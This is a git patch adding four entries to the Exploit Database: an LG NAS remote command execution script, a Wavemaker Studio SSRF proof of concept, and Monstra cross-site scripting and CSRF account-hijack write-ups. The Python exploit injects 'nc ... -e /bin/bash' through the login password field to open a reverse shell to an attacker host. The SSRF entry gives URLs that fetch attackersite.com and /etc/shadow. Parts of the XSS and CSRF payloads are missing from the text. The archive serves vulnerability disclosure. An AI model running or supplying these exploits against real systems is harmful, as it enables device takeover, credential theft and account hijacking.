From e5c23cdd534e6cf6251f610a8f26865fc37d9313 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 13 Aug 2018 05:01:45 +0000 Subject: [PATCH] DB: 2018-08-13 4 changes to exploits/shellcodes LG NAS 3718.510.a0 - Remote Command Execution Monstra 3.0.4 - Cross-Site Scripting Wavemaker Studio 6.6 - Server-Side Request Forgery Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking) --- exploits/hardware/webapps/45109.py | 52 ++++++++++++++++++++++++++++++ exploits/java/webapps/45158.txt | 35 ++++++++++++++++++++ exploits/php/webapps/45156.txt | 17 ++++++++++ exploits/php/webapps/45164.txt | 41 +++++++++++++++++++++++ files_exploits.csv | 4 +++ 5 files changed, 149 insertions(+) create mode 100755 exploits/hardware/webapps/45109.py create mode 100644 exploits/java/webapps/45158.txt create mode 100644 exploits/php/webapps/45156.txt create mode 100644 exploits/php/webapps/45164.txt diff --git a/exploits/hardware/webapps/45109.py b/exploits/hardware/webapps/45109.py new file mode 100755 index 000000000..7a0b0c807 --- /dev/null +++ b/exploits/hardware/webapps/45109.py @@ -0,0 +1,52 @@ +# LG NAS 3718.510.a0 - Remote Command Execution +# Author: @0x616163 +# Date: 2018-07-29 +# Credits: https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ +# CVE: N/A +# Firmware Version: 3718.510.a0 + +#!/usr/bin/env python + +import sys +import argparse +import requests +from collections import OrderedDict + +def checkUser(target): + # Exploiting this vulnerability requires a valid user account + # on the target NAS otherwise the vulnerable code is not executed + parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass'), ('mobile', 'false')]) + r = requests.post("http://" + target + ":8000/en/php/login_check.php", data=parameters) + if r.text == "NG:WRONG PASSWORD\n": + print "[*] Valid user found: admin" + return 0 + elif r.text == "NG:NO USER\n": + print "[*] User not found: admin" + sys.exit(1) + +def sendPayload(target,lhost,lport): + print "[*] Sending payload.." + try: + parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass;/usr/bin/nc ' + lhost + " " + lport + " " + '-e /bin/bash'), ('mobile', 'false')]) + r = requests.post("http://" + target + "/en/php/login_check.php", data=parameters,timeout=0.001) + except requests.exceptions.ReadTimeout: + print "[*] Payload sent. Exiting." + sys.exit(0) + + return 0 +def main(): + parser = argparse.ArgumentParser(add_help=True, description='LG NAS Unauthenticated Remote Code Execution') + parser.add_argument('-t', action="store", dest='target', help='Target host or IP') + parser.add_argument('-l', action="store", dest='lhost', help='Local host or IP') + parser.add_argument('-p', action="store", dest='lport', help='Listening TCP port to connect back to') + results = parser.parse_args() + args = vars(results) + if len(sys.argv) < 1: + parser.print_help() + sys.exit(1) + else: + if checkUser(args['target']) == 0: + sendPayload(args['target'], args['lhost'],args['lport']) + +main() +sys.exit(0) \ No newline at end of file diff --git a/exploits/java/webapps/45158.txt b/exploits/java/webapps/45158.txt new file mode 100644 index 000000000..2ba2e9656 --- /dev/null +++ b/exploits/java/webapps/45158.txt @@ -0,0 +1,35 @@ +# Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF). +# Exploit Author: Gionathan "John" Reale +# Google Dork: N/A +# Date: 2018-08-01 +# Vendor Homepage: http://www.wavemaker.com/ +# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/ +# Affected Version: 6.6 +# Tested on: Parrot OS +# CVE : N/A + +# Description +# Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an +# attacker to pass dangerous content to a victim via a phishing link. The vulnerability +# can also be exploited to access sensitive data or to use the server hosting Wavemaker +# as a form of HTTP proxy among other things. + +# Proof Of Concept +http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/ +http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow + +# Vulnerable Code +# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java + +# Line 419-430 +@ExposeToClient +public String getContent(String inUrl) throws IOException { + try { + String str = getRemoteContent(inUrl); + str = str.replace("", ""); + return str; + } catch (Exception e) { + return ""; + } +} \ No newline at end of file diff --git a/exploits/php/webapps/45156.txt b/exploits/php/webapps/45156.txt new file mode 100644 index 000000000..e765a3a45 --- /dev/null +++ b/exploits/php/webapps/45156.txt @@ -0,0 +1,17 @@ +# Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Scripting +# Date: 2018-08-04 +# Exploit Author: Nainsi Gupta +# Vendor Homepage: http://monstra.org/ +# Software Link: https://github.com/monstra-cms/monstra +# Product Name: Monstra-dev +# Version: 3.0.4 +# Tested on: Windows 10 (Firefox/Chrome) +# CVE : N/A + +# POC +1- Go to the site ( http://server.com/monstra-dev/ ) . +2- Click on Registration page (Registration) . +3- Register by giving you name ,mail and soo on... +4- Now log In i the website. +5- After loggin in click on edit profile and in the frist name and last name copy paste this payload- in firsname paste "> and in Lastname paste "> +6- After saving the above changes, click on edit profile page and you will be able to see to Pop up stating "Test" and "Case". \ No newline at end of file diff --git a/exploits/php/webapps/45164.txt b/exploits/php/webapps/45164.txt new file mode 100644 index 000000000..cea4a65ff --- /dev/null +++ b/exploits/php/webapps/45164.txt @@ -0,0 +1,41 @@ +# Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking) +# Date: 2018-08-04 +# Exploit Author: Nainsi Gupta +# Vendor Homepage: http://monstra.org/ +# Product Name: Monstra-dev +# Version: 3.0.4 +# Tested on: Windows 10 (Firefox/Chrome) +# CVE : N/A + +# 1. Description +# CSRF vulnerability in admin/user/edit in Monstra-dev 3.0.4 allows an attacker +# to take over a user account by modifying user's data such as email and password + +# 2. Exploit and Proof of Concept +# To exploit this vulnerability, victim need to be logged in at target site namely +# victim.com and visit crafted site made by attacker namely attacker.com. +# Then an authenticated POST request will be generated from victim browser and it will +# be submit to victim.com to modify user's data to attacker desired value. + +#POC:CSRF + + + + + +
+ + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 30a134ed5..f81659b97 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -39756,6 +39756,7 @@ id,file,description,date,author,type,platform,port 45103,exploits/linux/webapps/45103.txt,"Responsive Filemanager 9.13.1 - Server-Side Request Forgery",2018-07-30,"GUIA BRAHIM FOUAD",webapps,linux, 45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux, 45108,exploits/linux/webapps/45108.txt,"Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection",2018-07-31,0xB455,webapps,linux, +45109,exploits/hardware/webapps/45109.py,"LG NAS 3718.510.a0 - Remote Command Execution",2018-07-31,0x616163,webapps,hardware, 45127,exploits/php/webapps/45127.html,"WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)",2018-08-02,"Porhai Eung",webapps,php,80 45128,exploits/php/webapps/45128.txt,"TI Online Examination System v2 - Arbitrary File Download",2018-08-02,AkkuS,webapps,php,80 45129,exploits/php/webapps/45129.txt,"PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection",2018-08-02,AkkuS,webapps,php,80 @@ -39775,6 +39776,9 @@ id,file,description,date,author,type,platform,port 45152,exploits/aspx/webapps/45152.txt,"Sitecore.Net 8.1 - Directory Traversal",2018-08-06,Chris,webapps,aspx, 45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,8080 45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443 +45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80 +45158,exploits/java/webapps/45158.txt,"Wavemaker Studio 6.6 - Server-Side Request Forgery",2018-08-06,"Gionathan Reale",webapps,java, +45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php, 45172,exploits/hardware/webapps/45172.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)",2018-08-09,Wadeek,webapps,hardware,80 45173,exploits/hardware/webapps/45173.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)",2018-08-09,Wadeek,webapps,hardware,80 45177,exploits/php/webapps/45177.txt,"Zimbra 8.6.0_GA_1153 - Cross-Site Scripting",2018-08-10,"Dino Barlattani",webapps,php,